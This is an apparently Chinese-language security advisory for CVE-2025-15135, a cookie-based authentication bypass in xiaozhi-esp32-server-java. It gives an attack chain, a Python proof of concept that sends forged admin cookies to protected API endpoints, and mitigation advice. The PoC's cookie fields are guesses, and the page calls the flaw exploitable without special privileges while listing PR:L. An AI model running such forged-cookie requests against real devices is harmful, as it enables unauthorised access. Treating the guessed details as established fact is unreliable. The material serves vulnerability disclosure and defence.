CVE-2025-15135 | xiaozhi-esp32-server-java Cookie认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-15135

漏洞类型

认证绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

joey-zhou/xiaozhi-esp32-server-java

漏洞概述

CVE-2025-15135是joey-zhou开发的xiaozhi-esp32-server-java项目中的一个认证绕过漏洞。该漏洞存在于AuthenticationInterceptor.java文件的Cookie Handler组件中，具体影响tryAuthenticateWithCookies函数。攻击者可以通过构造恶意的Cookie值，在低权限情况下绕过身份认证机制，成功访问本应需要更高权限的资源或功能。该漏洞的CVSS评分为6.3，属于中危级别，攻击向量为网络形式，无需用户交互即可发起攻击。漏洞影响版本范围为1.0.0至3.0.0，官方已在4.0.0版本中修复此问题。由于xiaozhi-esp32-server-java是用于ESP32设备的服务端软件，广泛应用于物联网场景，该漏洞可能导致未经授权的设备控制或数据泄露风险。

技术细节

该漏洞的根本原因在于AuthenticationInterceptor.java中的tryAuthenticateWithCookies函数对Cookie值的验证不充分。攻击者可以通过以下方式利用此漏洞：1) 拦截正常的认证请求并提取有效的Cookie；2) 修改Cookie中的特定参数（如用户ID、权限级别等）；3) 使用修改后的Cookie发送请求，由于验证逻辑存在缺陷，系统可能错误地接受伪造的身份信息。具体技术细节包括：Cookie处理逻辑未正确校验Cookie完整性、缺乏签名或加密机制、服务器端会话验证不严格等。攻击者利用此漏洞可以实现权限提升，访问受保护的管理功能或获取敏感数据。由于攻击可远程发起且无需特殊权限，漏洞利用门槛较低，对使用受影响版本的用户构成安全威胁。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统运行的是xiaozhi-esp32-server-java版本<=3.0.0，通过端口扫描或服务指纹识别发现开放的服务端口

STEP 2

步骤2: 获取有效Cookie

攻击者通过正常登录流程获取一个有效的会话Cookie，或从公开渠道获取示例Cookie值

STEP 3

步骤3: Cookie篡改

攻击者修改Cookie中的关键字段，如user_id、auth_level、is_admin等参数，尝试构造具有管理员权限的伪造Cookie

STEP 4

步骤4: 认证绕过

使用篡改后的Cookie向受保护的API端点发送请求，由于tryAuthenticateWithCookies函数验证不严格，系统错误地接受了伪造的身份

STEP 5

步骤5: 权限提升与数据窃取

成功绕过认证后，攻击者可以访问管理功能、修改系统配置、获取敏感数据或完全控制ESP32设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15135 PoC - Cookie Authentication Bypass
# Target: xiaozhi-esp32-server-java <= 3.0.0

def exploit_cookie_bypass(target_url):
    """
    Exploit for CVE-2025-15135
    Cookie Handler Authentication Bypass via tryAuthenticateWithCookies
    """
    # Step 1: Obtain a valid session cookie through normal login or observation
    initial_cookie = {
        'session_id': 'test_session',
        'user_id': 'attacker_controlled_id',
        'auth_level': '1'
    }
    
    # Step 2: Craft malicious cookie with elevated privileges
    # The vulnerable function does not properly validate cookie integrity
    malicious_cookie = {
        'session_id': 'valid_session_from_legitimate_user',
        'user_id': 'admin',  # Attempt privilege escalation
        'auth_level': '999',  # Try to set highest privilege level
        'is_admin': 'true'
    }
    
    # Step 3: Send request with malicious cookie
    headers = {
        'Cookie': '; '.join([f'{k}={v}' for k, v in malicious_cookie.items()])
    }
    
    # Target protected endpoints
    protected_endpoints = [
        '/api/admin/users',
        '/api/admin/config',
        '/api/admin/system'
    ]
    
    for endpoint in protected_endpoints:
        url = f'{target_url}{endpoint}'
        response = requests.get(url, headers=headers)
        print(f'Endpoint: {endpoint}')
        print(f'Status: {response.status_code}')
        print(f'Response: {response.text[:200]}')
        print('-' * 50)

# Usage
if __name__ == '__main__':
    target = 'http://target-device:8080'
    exploit_cookie_bypass(target)

影响范围

joey-zhou/xiaozhi-esp32-server-java 1.0.0

joey-zhou/xiaozhi-esp32-server-java 2.0.0

joey-zhou/xiaozhi-esp32-server-java 2.5.0

joey-zhou/xiaozhi-esp32-server-java 3.0.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制暴露在公网的API端口访问，仅允许受信任的IP访问；2) 启用HTTPS并配置严格的传输层安全策略；3) 监控异常认证行为，设置告警机制；4) 定期轮换会话密钥；5) 实施额外的应用层身份验证，如双因素认证或API密钥验证。